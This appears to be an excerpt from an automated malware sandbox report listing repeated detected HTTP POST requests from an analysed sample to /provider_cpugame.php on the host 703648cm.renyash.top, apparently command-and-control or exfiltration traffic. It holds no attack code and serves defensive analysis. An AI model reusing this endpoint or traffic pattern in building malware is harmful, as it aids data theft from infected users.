                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 204424Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
